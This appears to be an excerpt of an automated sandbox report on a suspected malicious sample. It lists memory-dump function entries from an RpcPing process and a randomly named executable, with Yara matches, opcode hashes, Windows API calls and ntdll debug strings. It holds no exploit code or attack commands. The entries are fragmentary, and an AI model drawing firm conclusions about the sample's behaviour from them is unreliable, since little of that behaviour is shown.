                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction ID: 756ba355ded72a9eb8594cfcfbf97648fa92c248e33ac9870b422ab6821e8fe5
                                  • Opcode Fuzzy Hash: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction Fuzzy Hash: 5CE065BA2103087FD614EF58DC40EEB73ACEF89714F004008FA08AB281C770B9608AB8
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 03277DEA
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: c81a18ba6a86361fee52a62b033c367aa37e2c009ed254374633b6366196f5b8
                                  • Instruction ID: 5b305da719905e350555c2e4c3918f22f086094b34432f0153bb80db2e87f2f6
                                  • Opcode Fuzzy Hash: c81a18ba6a86361fee52a62b033c367aa37e2c009ed254374633b6366196f5b8
                                  • Instruction Fuzzy Hash: BAE0867526030427FB24E6ACDC45F7633689B4D624F1C4A60F92CDB2D1E678F5A24254
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,032717E0,0328795F,0328501F,032717B0), ref: 03277BF1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 253b9103bfca7d0944a35dff87ba77b389f5ec5bf95687bdf43f8c3e22e8b28c
                                  • Instruction ID: d9b03ee82e01193721258388d90e7024d283e572128a8c1c1e4081046237605b
                                  • Opcode Fuzzy Hash: 253b9103bfca7d0944a35dff87ba77b389f5ec5bf95687bdf43f8c3e22e8b28c
                                  • Instruction Fuzzy Hash: 41D05EB56613053BF610F7E6DC46F6A368C6B04664F084064F90CEB2C1ECA5F1A04265
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 812d7100c8d63216b5dd7ad9946c624dca1fc029a246bcc1b5c98ca74d18bd1e
                                  • Instruction ID: 7051a2c5d515fc14317e85144455a597994e5fa2423abe443ea48e369693c734
                                  • Opcode Fuzzy Hash: 812d7100c8d63216b5dd7ad9946c624dca1fc029a246bcc1b5c98ca74d18bd1e
                                  • Instruction Fuzzy Hash: 82B09B719015C5C5DA11E7604A0C717790867D0701F1AC477E6030641F473DC5D1E175
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931753089.0000000003D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3d30000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab4a3274d02f24b338eae97451749ae2b600a7430a809f0f1744c59046019edd
                                  • Instruction ID: efea9018193f9bffc57317e4849987db1aa81f936f5e772b9da285c001295e8e
                                  • Opcode Fuzzy Hash: ab4a3274d02f24b338eae97451749ae2b600a7430a809f0f1744c59046019edd
                                  • Instruction Fuzzy Hash: D241D4B5518B0D4FD368EF689081676F3E6FF86300F50462DD98BC7252EA70D8468795
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931753089.0000000003D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3d30000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                  • API String ID: 0-3754132690
                                  • Opcode ID: 9220bd2dfeed275025caa9f86350a2616883af7eedbeda1a8dc1d3d7f3d6e9a2
                                  • Instruction ID: 05a5c65a407adf55f386ff258988f9919e4a771e4343ee5c6ca8c7340cb53257
                                  • Opcode Fuzzy Hash: 9220bd2dfeed275025caa9f86350a2616883af7eedbeda1a8dc1d3d7f3d6e9a2
                                  • Instruction Fuzzy Hash: C99150F04082988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B95
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: d14dbb8c201467091f40505d5b91b245ff8a7d320cdce034b28506d5f2d6ba1e
                                  • Instruction ID: fc62d7877771202ee96959098a06c295aab3c7463eb893256c33d97d36a4974d
                                  • Opcode Fuzzy Hash: d14dbb8c201467091f40505d5b91b245ff8a7d320cdce034b28506d5f2d6ba1e
                                  • Instruction Fuzzy Hash: F051D7B6A04216BFCB15DB988990A7EF7B8BB49200714856FF865D7741D334DE408BE0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 9e3b1161d54f1b208f1c9c6fcfce40777ff43594338cd1dbf9764ef57eef6b5f
                                  • Instruction ID: f2372526a957b3be4b4626cdd14a5b4d9334600ac3530e65d617d5966d4e7a58
                                  • Opcode Fuzzy Hash: 9e3b1161d54f1b208f1c9c6fcfce40777ff43594338cd1dbf9764ef57eef6b5f
                                  • Instruction Fuzzy Hash: 4851C575A10689AFDF20DF5CC990A7FF7F9EB44200B0488AFE4A6D7682D774DA408760
                                  Strings
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A84725
                                  • Execute=1, xrefs: 03A84713
                                  • ExecuteOptions, xrefs: 03A846A0
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A84787
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A84742
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A846FC
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A84655
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 27ece9a823ad5a81a59dcbbd24d2ab80b3baa60126ec96cae96b1032561ee25a
                                  • Instruction ID: 641e29a045c0c32fbf24e09076f643cd306ce21500efb902b4ff937d0bef2da9
                                  • Opcode Fuzzy Hash: 27ece9a823ad5a81a59dcbbd24d2ab80b3baa60126ec96cae96b1032561ee25a
                                  • Instruction Fuzzy Hash: 34513A35600359BEDF10EB65DD85FAEB3BDEF89304F04009BE515AB281D7729A418F50
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                  • Instruction ID: fd10b46b74f295506d72cd757f7dd0bed9d5fb5fa19fd71e380c79d67a82e0c5
                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                  • Instruction Fuzzy Hash: A0021275508341AFC308CF18C990A6BBBF5EFD8710F448A2EB9999B264DB31E905CB52
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                  • Instruction ID: e65521cfad967e832f62ad34c0f5189c9cad8891bd3f44865d327fb93ecbcdcd
                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                  • Instruction Fuzzy Hash: AC817C74E062499EDF28CF68C8917AEBBB6AF46312F1C415FFC61A7791C63499408B70
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: ba340a58c089d7f5d483979fb890e651a032fc155367b4e895fb30214bcd6501
                                  • Instruction ID: 8521e5b2ea82df80e97eafecca9e27bf22bcf10828a961424e75029e254256e2
                                  • Opcode Fuzzy Hash: ba340a58c089d7f5d483979fb890e651a032fc155367b4e895fb30214bcd6501
                                  • Instruction Fuzzy Hash: 9A216276A10259ABCF11EF79DD40AEEB7F8EF54644F08052FE905E7240E730DA018BA1
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A802BD
                                  • RTL: Re-Waiting, xrefs: 03A8031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A802E7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: ea68fa4d8bf07f7cd986f175d250fe63c385e9d8d145e8519f068219707f1af8
                                  • Instruction ID: 999a6a80eae4d108e482b1fade293641a98e0a6113b300a8586ee5b943a08a21
                                  • Opcode Fuzzy Hash: ea68fa4d8bf07f7cd986f175d250fe63c385e9d8d145e8519f068219707f1af8
                                  • Instruction Fuzzy Hash: 88E1A031A14741AFD725DF28C984B2AB7E0FB86324F180A5EF5A58B3E1D774D948CB42
                                  Strings
                                  • RTL: Resource at %p, xrefs: 03A87B8E
                                  • RTL: Re-Waiting, xrefs: 03A87BAC
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03A87B7F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 94951f9993f33d44fa256b8605c1e59cbf46bb947998624c947bf7c93da863b0
                                  • Instruction ID: 16dfbe61a1931b459b35d8e55198b3291dd66f8582ef41ab36790b90dd62cc2f
                                  • Opcode Fuzzy Hash: 94951f9993f33d44fa256b8605c1e59cbf46bb947998624c947bf7c93da863b0
                                  • Instruction Fuzzy Hash: 1C41B1353047029FD724DF29C941B6AB7E5EFC8710F140A1FE99ADB680DB31E8058BA1
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A8728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03A87294
                                  • RTL: Resource at %p, xrefs: 03A872A3
                                  • RTL: Re-Waiting, xrefs: 03A872C1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: c2a7c092cc716e2bccd304be703f9abf0abbb75c3daf012c5e1f67bbcdf465a5
                                  • Instruction ID: c64b7830f94101bfadd12f92affe1457a1a326bf2fb8f1726a772212873bc512
                                  • Opcode Fuzzy Hash: c2a7c092cc716e2bccd304be703f9abf0abbb75c3daf012c5e1f67bbcdf465a5
                                  • Instruction Fuzzy Hash: EE41E335600206AFD724EF24CD41B6AB7A5FB94710F24061AF995EB240EB31E85187E1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 2cbb01aee4f831c912993f876b7f970db465ce5db74473a4cc104feeba27155d
                                  • Instruction ID: 64763e54e6f7f3802f1bc7b432f471e80903bd9101082e65a9ee51263e88fb8b
                                  • Opcode Fuzzy Hash: 2cbb01aee4f831c912993f876b7f970db465ce5db74473a4cc104feeba27155d
                                  • Instruction Fuzzy Hash: 8F316676A102599FDF20DF29DD40BEEB7B8EB44610F44459FE849E7340EB309A54CBA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                  • Instruction ID: e60a12600d42fa943460c0e57e2713d891f8de539d418144ba35294e1d916ed7
                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                  • Instruction Fuzzy Hash: D4919D71E4031A9ADB24DF69C880ABEB7A5AF44320F58461FFC65F7280E6369940CB60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 50bc04c3fbfff7052cec08c680b49e30fcb964b71c7c4ab6fb238b22e2241a67
                                  • Instruction ID: a4e3bf59230ef2d2202118d40fbceeacb9cb29b1f84e17c311f9496ba37b975a
                                  • Opcode Fuzzy Hash: 50bc04c3fbfff7052cec08c680b49e30fcb964b71c7c4ab6fb238b22e2241a67
                                  • Instruction Fuzzy Hash: 41813875D002699BDB75DB54CD44BEEB7B8AB08750F0445EBA90AB7280E7309E84CFA0

                                  Execution Graph

                                  Execution Coverage:2.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:3
                                  Total number of Limit Nodes:0
                                  execution_graph 12256 58e7099 12257 58e70b6 12256->12257 12258 58e70c5 closesocket 12257->12258

                                  Control-flow Graph

                                  control_flow_graph 24 58e7099-58e70d3 call 58bf169 call 58e7c79 closesocket
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Offset: 05870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_5870000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: 797bc2e897e9f15d747c2332ec9e493d8587a25c208b171719e07a6b5cd29495
                                  • Instruction ID: e08110bc03fbf50e463d388c3463aace39c9fde13298672c3bef6a39890637c8
                                  • Opcode Fuzzy Hash: 797bc2e897e9f15d747c2332ec9e493d8587a25c208b171719e07a6b5cd29495
                                  • Instruction Fuzzy Hash: D8E04636204614BBE210AAAADC04CDBB36DDBC5310B008416FE08AB200CAB1A9118BF2